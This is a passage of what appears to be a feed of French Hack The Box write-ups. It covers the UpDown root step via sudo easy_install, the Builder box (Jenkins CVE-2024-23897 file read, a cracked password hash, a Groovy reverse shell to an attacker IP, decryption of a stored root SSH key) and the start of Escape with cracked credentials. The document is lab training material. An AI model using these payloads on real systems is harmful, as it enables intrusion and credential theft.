class="line"><span class="cl">d235....edcf </span></span></code></pre></td></tr></table> </div> </div><h2 id="developer---root">developer -&gt; root </h2><h3 id="easy_install-as-root">easy_install as root </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span><span class="lnt">5 </span><span class="lnt">6 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">developer@updown:~$ sudo -l </span></span><span class="line"><span class="cl">Matching Defaults entries <span class="k">for</span> developer on localhost: </span></span><span class="line"><span class="cl"> env_reset, mail_badpass, <span class="nv">secure_path</span><span class="o">=</span>/usr/local/sbin<span class="se">\:</span>/usr/local/bin<span class="se">\:</span>/usr/sbin<span class="se">\:</span>/usr/bin<span class="se">\:</span>/sbin<span class="se">\:</span>/bin<span class="se">\:</span>/snap/bin </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">User developer may run the following commands on localhost: </span></span><span class="line"><span class="cl"> <span class="o">(</span>ALL<span class="o">)</span> NOPASSWD: /usr/local/bin/easy_install </span></span></code></pre></td></tr></table> </div> </div><p>Sur GTFObins, on trouve un chemin d&rsquo;exploitation pour passer root:<br> <a class="link" href="https://gtfobins.github.io/gtfobins/easy_install/" target="_blank" rel="noopener" >https://gtfobins.github.io/gtfobins/easy_install/</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="nv">TF</span><span class="o">=</span><span class="k">$(</span>mktemp -d<span class="k">)</span> </span></span><span class="line"><span class="cl"><span class="nb">echo</span> <span class="s2">&#34;import os; os.execl(&#39;/bin/sh&#39;, &#39;sh&#39;, &#39;-c&#39;, &#39;sh &lt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> &gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> 2&gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2">&#39;)&#34;</span> &gt; <span class="nv">$TF</span>/setup.py </span></span><span class="line"><span class="cl">sudo easy_install <span class="nv">$TF</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------------ </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">developer@updown:/tmp$ <span class="nv">TF</span><span class="o">=</span><span class="k">$(</span>mktemp -d<span class="k">)</span> </span></span><span class="line"><span class="cl">developer@updown:/tmp$ <span class="nb">echo</span> <span class="s2">&#34;import os; os.execl(&#39;/bin/sh&#39;, &#39;sh&#39;, &#39;-c&#39;, &#39;sh &lt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> &gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2"> 2&gt;</span><span class="k">$(</span>tty<span class="k">)</span><span class="s2">&#39;)&#34;</span> &gt; <span class="nv">$TF</span>/setup.py </span></span><span class="line"><span class="cl">developer@updown:/tmp$ sudo easy_install <span class="nv">$TF</span> </span></span><span class="line"><span class="cl">WARNING: The easy_install <span class="nb">command</span> is deprecated and will be removed in a future version. </span></span><span class="line"><span class="cl">Processing tmp.hlSwiYYkel </span></span><span class="line"><span class="cl">Writing /tmp/tmp.hlSwiYYkel/setup.cfg </span></span><span class="line"><span class="cl">Running setup.py -q bdist_egg --dist-dir /tmp/tmp.hlSwiYYkel/egg-dist-tmp-KNZfWR </span></span><span class="line"><span class="cl"><span class="c1"># whoami</span> </span></span><span class="line"><span class="cl">root </span></span><span class="line"><span class="cl"><span class="c1"># cat /root/root.txt </span> </span></span><span class="line"><span class="cl">7077....3986 </span></span></code></pre></td></tr></table> </div> </div><p>Il suffit de créer un dossier, avec un fichier setup.py expliquant comment notre module python doit s&rsquo;installer. On injecte un code malveillant dans ce fichier et il sera executer en tant que root lors du lancement de <strong>easy_install</strong>.</p>HTB | Builderhttps://leopoldabgn.github.io/writeups/p/builder-htb/Sat, 25 Oct 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/builder-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Builder cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Builder</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.10</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">- jennifer : **princess** </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ nmap -sC -sV -An -T4 -vvv -p- 10.10.11.10 </span></span><span class="line"><span class="cl">PORT STATE SERVICE REASON VERSION </span></span><span class="line"><span class="cl">22/tcp open ssh syn-ack ttl <span class="m">63</span> OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 <span class="o">(</span>Ubuntu Linux<span class="p">;</span> protocol 2.0<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ssh-hostkey: </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 3eea454bc5d16d6fe2d4d13b0a3da94f <span class="o">(</span>ECDSA<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJ+m7rYl1vRtnm789pH3IRhxI4CNCANVj+N5kovboNzcw9vHsBwvPX3KYA3cxGbKiA0VqbKRpOHnpsMuHEXEVJc<span class="o">=</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> <span class="m">256</span> 64cc75de4ae6a5b473eb3f1bcfb4e394 <span class="o">(</span>ED25519<span class="o">)</span> </span></span><span class="line"><span class="cl"><span class="p">|</span>_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOtuEdoYxTohG80Bo6YCqSzUY9+qbnAFnhsk4yAZNqhM </span></span><span class="line"><span class="cl">8080/tcp open http syn-ack ttl <span class="m">62</span> Jetty 10.0.18 </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-title: Dashboard <span class="o">[</span>Jenkins<span class="o">]</span> </span></span><span class="line"><span class="cl"><span class="p">|</span> http-robots.txt: <span class="m">1</span> disallowed entry </span></span><span class="line"><span class="cl"><span class="p">|</span>_/ </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-favicon: Unknown favicon MD5: 23E8C7BD78E8CD826C5A6073B15068B1 </span></span><span class="line"><span class="cl"><span class="p">|</span> http-methods: </span></span><span class="line"><span class="cl"><span class="p">|</span>_ Supported Methods: GET HEAD POST OPTIONS </span></span><span class="line"><span class="cl"><span class="p">|</span> http-open-proxy: Potentially OPEN proxy. </span></span><span class="line"><span class="cl"><span class="p">|</span>_Methods supported:CONNECTION </span></span><span class="line"><span class="cl"><span class="p">|</span>_http-server-header: Jetty<span class="o">(</span>10.0.18<span class="o">)</span> </span></span></code></pre></td></tr></table> </div> </div><h2 id="foothold">Foothold </h2><h3 id="jenkins-2441---port-8080">Jenkins 2.441 - port 8080 </h3><h3 id="local-file-inclusion---cve-2024-23897">Local File Inclusion - CVE-2024-23897 </h3><p>On trouve sur internet que Jenkins 2.441 est vulnérable à une LFI, permettant d&rsquo;accéder à n&rsquo;importe quel fichier sur la machine : <a class="link" href="https://www.exploit-db.com/exploits/51993" target="_blank" rel="noopener" >https://www.exploit-db.com/exploits/51993</a></p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span><span class="lnt">14 </span><span class="lnt">15 </span><span class="lnt">16 </span><span class="lnt">17 </span><span class="lnt">18 </span><span class="lnt">19 </span><span class="lnt">20 </span><span class="lnt">21 </span><span class="lnt">22 </span><span class="lnt">23 </span><span class="lnt">24 </span><span class="lnt">25 </span><span class="lnt">26 </span><span class="lnt">27 </span><span class="lnt">28 </span><span class="lnt">29 </span><span class="lnt">30 </span><span class="lnt">31 </span><span class="lnt">32 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ python3 exploit.py -u http://10.10.11.10:8080 </span></span><span class="line"><span class="cl">Press Ctrl+C to <span class="nb">exit</span> </span></span><span class="line"><span class="cl">File to download: </span></span><span class="line"><span class="cl">&gt; /etc/hosts </span></span><span class="line"><span class="cl">ff02::1 ip6-allnodes </span></span><span class="line"><span class="cl">ff02::2 ip6-allrouters </span></span><span class="line"><span class="cl">172.17.0.2 0f52c222a4cc </span></span><span class="line"><span class="cl">::1 localhost ip6-localhost ip6-loopback </span></span><span class="line"><span class="cl">ff00::0 ip6-mcastprefix </span></span><span class="line"><span class="cl">127.0.0.1 localhost </span></span><span class="line"><span class="cl">fe00::0 ip6-localnet </span></span><span class="line"><span class="cl">File to download: </span></span><span class="line"><span class="cl">&gt; /etc/passwd </span></span><span class="line"><span class="cl">www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin </span></span><span class="line"><span class="cl">root:x:0:0:root:/root:/bin/bash </span></span><span class="line"><span class="cl">mail:x:8:8:mail:/var/mail:/usr/sbin/nologin </span></span><span class="line"><span class="cl">backup:x:34:34:backup:/var/backups:/usr/sbin/nologin </span></span><span class="line"><span class="cl">_apt:x:42:65534::/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin </span></span><span class="line"><span class="cl">lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin </span></span><span class="line"><span class="cl">bin:x:2:2:bin:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">news:x:9:9:news:/var/spool/news:/usr/sbin/nologin </span></span><span class="line"><span class="cl">proxy:x:13:13:proxy:/bin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin </span></span><span class="line"><span class="cl">list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin </span></span><span class="line"><span class="cl">jenkins:x:1000:1000::/var/jenkins_home:/bin/bash </span></span><span class="line"><span class="cl">games:x:5:60:games:/usr/games:/usr/sbin/nologin </span></span><span class="line"><span class="cl">man:x:6:12:man:/var/cache/man:/usr/sbin/nologin </span></span><span class="line"><span class="cl">daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sys:x:3:3:sys:/dev:/usr/sbin/nologin </span></span><span class="line"><span class="cl">sync:x:4:65534:sync:/bin:/bin/sync </span></span></code></pre></td></tr></table> </div> </div><p>Dans le /etc/hosts, on trouve:</p> <blockquote> <p>172.17.0.2 0f52c222a4cc</p> </blockquote> <p>On en déduit que jenkins tourne dans un docker, au vu de l&rsquo;ip en 172 et du hostname en hexadecimal.</p> <p>Dans /etc/passwd, on trouve le dossier contenant les fichiers de Jenkins:</p> <blockquote> <p>jenkins:x:1000:1000::/var/jenkins_home:/bin/bash</p> </blockquote> <p>Toujours à l&rsquo;aide de la LFI, on tente de récupérer le fichier de configuration de Jenkins pour obtenir des credentials :</p> <blockquote> <p>/var/jenkins_home</p> </blockquote> <p>En cherchant sur internet, je comprends que chaque utilisateur à un fichier config.xml contenant probablement le hachage de leur mot de passe.</p> <blockquote> <p>/var/lib/jenkins/users/jenkins_[udid]/config.xml</p> </blockquote> <p>De plus, j&rsquo;ai télécharger la version de Jenkins 2.441 que j&rsquo;ai installé sur une machine virtuelle, afin de pouvoir observer correctement l&rsquo;arborescence des fichiers. Sur le dashboard de Jenkins, j&rsquo;ai trouvé le nom d&rsquo;utilisateur &ldquo;jennifer&rdquo; qui semble correspondre au compte administrateur.</p> <p>En regardant de plus près dans les fichiers de mon installation de Jenkins, j&rsquo;ai trouvé un fichier <strong>/var/lib/jenkins/users/users.xml</strong> contenant la liste des users et leur <strong>uid</strong>. En dumpant ce fichier, on trouve l&rsquo;uid de jennifer, et donc le nom du dossier:</p> <blockquote> <p>jennifer_12108429903186576833</p> </blockquote> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&gt; /var/jenkins_home/users/users.xml </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;1.1&#39;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s1">&#39;UTF-8&#39;</span>?&gt; </span></span><span class="line"><span class="cl"> &lt;string&gt;jennifer_12108429903186576833&lt;/string&gt; </span></span><span class="line"><span class="cl"> &lt;idToDirectoryNameMap <span class="nv">class</span><span class="o">=</span><span class="s2">&#34;concurrent-hash-map&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;entry&gt; </span></span><span class="line"><span class="cl"> &lt;string&gt;jennifer&lt;/string&gt; </span></span><span class="line"><span class="cl"> &lt;version&gt;1&lt;/version&gt; </span></span><span class="line"><span class="cl">&lt;/hudson.model.UserIdMapper&gt; </span></span><span class="line"><span class="cl"> &lt;/idToDirectoryNameMap&gt; </span></span><span class="line"><span class="cl">&lt;hudson.model.UserIdMapper&gt; </span></span><span class="line"><span class="cl"> &lt;/entry&gt; </span></span></code></pre></td></tr></table> </div> </div><p>Enfin, je tente de récupérer le fichier <strong>config.xml</strong> de jennifer :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">File to download: </span></span><span class="line"><span class="cl">&gt; /var/jenkins_home/users/jennifer_12108429903186576833/config.xml </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;1.1&#39;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s1">&#39;UTF-8&#39;</span>?&gt; </span></span><span class="line"><span class="cl"> &lt;fullName&gt;jennifer&lt;/fullName&gt; </span></span><span class="line"><span class="cl"> &lt;seed&gt;6841d11dc1de101d&lt;/seed&gt; </span></span><span class="line"><span class="cl"> &lt;id&gt;jennifer&lt;/id&gt; </span></span><span class="line"><span class="cl"> &lt;version&gt;10&lt;/version&gt; </span></span><span class="line"><span class="cl"> &lt;tokenStore&gt; </span></span><span class="line"><span class="cl"> &lt;filterExecutors&gt;false&lt;/filterExecutors&gt; </span></span><span class="line"><span class="cl"> &lt;io.jenkins.plugins.thememanager.ThemeUserProperty <span class="nv">plugin</span><span class="o">=</span><span class="s2">&#34;theme-manager@215.vc1ff18d67920&#34;</span>/&gt; </span></span><span class="line"><span class="cl"> &lt;passwordHash&gt;#jbcrypt:<span class="nv">$2</span>a<span class="nv">$10$UwR7BpEH</span>.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a&lt;/passwordHash&gt; </span></span></code></pre></td></tr></table> </div> </div><p>J&rsquo;ai obtenu le hachage de jennifer sur lequel j&rsquo;ai pu effectuer une attaque par dictionnaire avec la liste rockyou.txt :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ hashcat -m <span class="m">3200</span> hash.txt ~/wordlists/rockyou.txt --show </span></span><span class="line"><span class="cl"><span class="nv">$2</span>a<span class="nv">$10$UwR7BpEH</span>.ccfpi1tv6w/XuBtS44S7oUpR2JYiobqxcDQJeN/L4l1a:princess </span></span></code></pre></td></tr></table> </div> </div><p>On obtient finalement les credentials de <strong>jennifer</strong> nous permettant d&rsquo;obtenir un accès administrateur sur l&rsquo;interface web de Jenkins :</p> <ul> <li>jennifer : <strong>princess</strong></li> </ul> <h3 id="jenkins-reverse-shell">Jenkins Reverse Shell </h3><p>http://10.10.11.10:8080/manage/script</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span><span class="lnt">11 </span><span class="lnt">12 </span><span class="lnt">13 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">String <span class="nv">host</span><span class="o">=</span><span class="s2">&#34;10.10.14.11&#34;</span><span class="p">;</span>int <span class="nv">port</span><span class="o">=</span>1337<span class="p">;</span>String <span class="nv">cmd</span><span class="o">=</span><span class="s2">&#34;bash&#34;</span><span class="p">;</span>Process <span class="nv">p</span><span class="o">=</span>new ProcessBuilder<span class="o">(</span>cmd<span class="o">)</span>.redirectErrorStream<span class="o">(</span><span class="nb">true</span><span class="o">)</span>.start<span class="o">()</span><span class="p">;</span>Socket <span class="nv">s</span><span class="o">=</span>new Socket<span class="o">(</span>host,port<span class="o">)</span><span class="p">;</span>InputStream <span class="nv">pi</span><span class="o">=</span>p.getInputStream<span class="o">()</span>,pe<span class="o">=</span>p.getErrorStream<span class="o">()</span>, <span class="nv">si</span><span class="o">=</span>s.getInputStream<span class="o">()</span><span class="p">;</span>OutputStream <span class="nv">po</span><span class="o">=</span>p.getOutputStream<span class="o">()</span>,so<span class="o">=</span>s.getOutputStream<span class="o">()</span><span class="p">;</span><span class="k">while</span><span class="o">(</span>!s.isClosed<span class="o">()){</span><span class="k">while</span><span class="o">(</span>pi.available<span class="o">()</span>&gt;0<span class="o">)</span>so.write<span class="o">(</span>pi.read<span class="o">())</span><span class="p">;</span><span class="k">while</span><span class="o">(</span>pe.available<span class="o">()</span>&gt;0<span class="o">)</span>so.write<span class="o">(</span>pe.read<span class="o">())</span><span class="p">;</span><span class="k">while</span><span class="o">(</span>si.available<span class="o">()</span>&gt;0<span class="o">)</span>po.write<span class="o">(</span>si.read<span class="o">())</span><span class="p">;</span>so.flush<span class="o">()</span><span class="p">;</span>po.flush<span class="o">()</span><span class="p">;</span>Thread.sleep<span class="o">(</span>50<span class="o">)</span><span class="p">;</span>try <span class="o">{</span>p.exitValue<span class="o">()</span><span class="p">;</span>break<span class="p">;</span><span class="o">}</span>catch <span class="o">(</span>Exception e<span class="o">){}}</span><span class="p">;</span>p.destroy<span class="o">()</span><span class="p">;</span>s.close<span class="o">()</span><span class="p">;</span> </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">------------------- </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">nc -lnvp <span class="m">1337</span> </span></span><span class="line"><span class="cl">Ncat: Version 7.93 <span class="o">(</span> https://nmap.org/ncat <span class="o">)</span> </span></span><span class="line"><span class="cl">Ncat: Listening on :::1337 </span></span><span class="line"><span class="cl">Ncat: Listening on 0.0.0.0:1337 </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.10. </span></span><span class="line"><span class="cl">Ncat: Connection from 10.10.11.10:34418. </span></span><span class="line"><span class="cl"> </span></span><span class="line"><span class="cl">cat /var/jenkins_home/user.txt </span></span><span class="line"><span class="cl">7712.....64b9 </span></span></code></pre></td></tr></table> </div> </div><h2 id="privilege-escalation">Privilege Escalation </h2><h3 id="root---ssh-private-key">Root - SSH Private Key </h3><p><a class="link" href="https://devops.stackexchange.com/questions/2191/how-to-decrypt-jenkins-passwords-from-credentials-xml" target="_blank" rel="noopener" >https://devops.stackexchange.com/questions/2191/how-to-decrypt-jenkins-passwords-from-credentials-xml</a></p> <p>On trouve un fichier <strong>credentials.xml</strong> contenant un secret chiffré :</p> <p><code>/var/jenkins_home/credentials.xml</code> :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">&lt;?xml <span class="nv">version</span><span class="o">=</span><span class="s1">&#39;1.1&#39;</span> <span class="nv">encoding</span><span class="o">=</span><span class="s1">&#39;UTF-8&#39;</span>?&gt; </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">&lt;com.cloudbees.plugins.credentials.SystemCredentialsProvider <span class="nv">plugin</span><span class="o">=</span><span class="s2">&#34;credentials@1319.v7eb_51b_3a_c97b_&#34;</span>&gt; </span></span><span class="line"><span class="cl"> &lt;java.util.concurrent.CopyOnWriteArrayList&gt; </span></span><span class="line"><span class="cl"> &lt;privateKey&gt;<span class="o">{</span>AQAAABAAAAowLrfCrZx9baWliwrtC...........HaB1OTIcTxtaaMR8IMMaKSM<span class="o">=}</span>&lt;/privateKey&gt; </span></span><span class="line"><span class="cl"> &lt;/privateKeySource&gt; </span></span><span class="line"><span class="cl"> &lt;username&gt;root&lt;/username&gt; </span></span><span class="line"><span class="cl"> &lt;usernameSecret&gt;false&lt;/usernameSecret&gt; </span></span><span class="line"><span class="cl"> &lt;/com.cloudbees.plugins.credentials.domains.Domain&gt; </span></span><span class="line"><span class="cl">... </span></span></code></pre></td></tr></table> </div> </div><p>Après quelques recherches sur le web, on comprend que les informations contenus dans ce fichier correspondent à des mots de passe ou clés SSH chiffrés, associés à des utilisateurs. Sur l&rsquo;interface graphique de Jenkins, on observe qu&rsquo;une clé SSH semble enregistrée pour un utilisateur <strong>root</strong>.</p> <p>Sur un forum en ligne, on nous explique que le secret dans la balise &ldquo;<privateKey>&rdquo; du fichier <code>credentials.xml</code> peut etre déchiffré en se rendant dans la console disponible sur la GUI : http://10.10.11.10:8080/script</p> <p>Il suffit alors d&rsquo;executer la commande suivante :</p> <blockquote> <p>println(hudson.util.Secret.decrypt(&quot;{PRIVATE_KEY}&quot;))</p> </blockquote> <p>Ce qui nous donne :</p> <blockquote> <p>println(hudson.util.Secret.decrypt(&quot;{AQAAABAAAAo&hellip;IcTxtaaMR8IMMaKSM=}&quot;))</p> </blockquote> <p>Sur le screenshot, on observe l&rsquo;execution du script qui nous permet de récupérer une clé privée SSH :</p> <p><img src="https://leopoldabgn.github.io/writeups/p/builder-htb/image.png" width="1272" height="1713" srcset="https://leopoldabgn.github.io/writeups/p/builder-htb/image_hu_309fe7e494881cde.png 480w, https://leopoldabgn.github.io/writeups/p/builder-htb/image_hu_c45732d5af91b453.png 1024w" loading="lazy" alt="Script Console - SSH Private Key Decrypt" class="gallery-image" data-flex-grow="74" data-flex-basis="178px" ></p> <h3 id="ssh-as-root">SSH as root </h3><p>A l&rsquo;aide de la clé SSH, on se connecte directement en tant que <strong>root</strong> sur la machine :</p> <div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt">10 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl">$ vim root.key </span></span><span class="line"><span class="cl">$ chmod <span class="m">600</span> root.key </span></span><span class="line"><span class="cl">$ ssh root@10.10.11.10 -i root.key </span></span><span class="line"><span class="cl">Welcome to Ubuntu 22.04.3 LTS <span class="o">(</span>GNU/Linux 5.15.0-94-generic x86_64<span class="o">)</span> </span></span><span class="line"><span class="cl">... </span></span><span class="line"><span class="cl">Last login: Mon Feb <span class="m">12</span> 13:15:44 <span class="m">2024</span> from 10.10.14.40 </span></span><span class="line"><span class="cl">root@builder:~# ls </span></span><span class="line"><span class="cl">root.txt </span></span><span class="line"><span class="cl">root@builder:~# cat root.txt </span></span><span class="line"><span class="cl">a9aa.....0396 </span></span></code></pre></td></tr></table> </div> </div>HTB | Escapehttps://leopoldabgn.github.io/writeups/p/escape-htb/Wed, 10 Sep 2025 00:00:00 +0000https://leopoldabgn.github.io/writeups/p/escape-htb/<table style="border:none; width:100%;"> <tr> <!-- Colonne gauche : logo --> <td style="border:none; text-align:center; vertical-align:middle; width:150px;"> <img src="cover.png" alt="Escape cover" width="120"> </td> <td style="border:none; text-align:center; vertical-align:middle;"> <table style="margin:auto; border-collapse:collapse; border:1px solid #ddd;"> <thead> <tr> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Machine name</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">OS</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">IP</th> <th style="padding:8px; border:1px solid #ddd; text-align:center;">Difficulty</th> </tr> </thead> <tbody> <tr> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Escape</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Windows</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">10.10.11.202</td> <td style="padding:8px; border:1px solid #ddd; text-align:center;">Medium</td> </tr> </tbody> </table> </td> </tr> </table> <h2 id="users">Users </h2><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt">1 </span><span class="lnt">2 </span><span class="lnt">3 </span><span class="lnt">4 </span></code></pre></td> <td class="lntd"> <pre tabindex="0" class="chroma"><code class="language-bash" data-lang="bash"><span class="line"><span class="cl"><span class="c1"># SQL Server</span> </span></span><span class="line"><span class="cl">PublicUser : GuestUserCantWrite1 </span></span><span class="line"><span class="cl">sql_svc : REGGIE1234ronnie </span></span><span class="line"><span class="cl">Ryan.cooper : NuclearMosquito3 </span></span></code></pre></td></tr></table> </div> </div><h2 id="enumeration">Enumeration </h2><h3 id="nmap">nmap </h3><div class="highlight"><div class="chroma"> <table class="lntable"><tr><td class="lntd"> <pre tabindex="0" class="chroma"><code><span class="lnt"> 1 </span><span class="lnt"> 2 </span><span class="lnt"> 3 </span><span class="lnt"> 4 </span><span class="lnt"> 5 </span><span class="lnt"> 6 </span><span class="lnt"> 7 </span><span class="lnt"> 8 </span><span class="lnt"> 9 </span><span class="lnt"> 10 </span><span class="lnt"> 11 </span><span 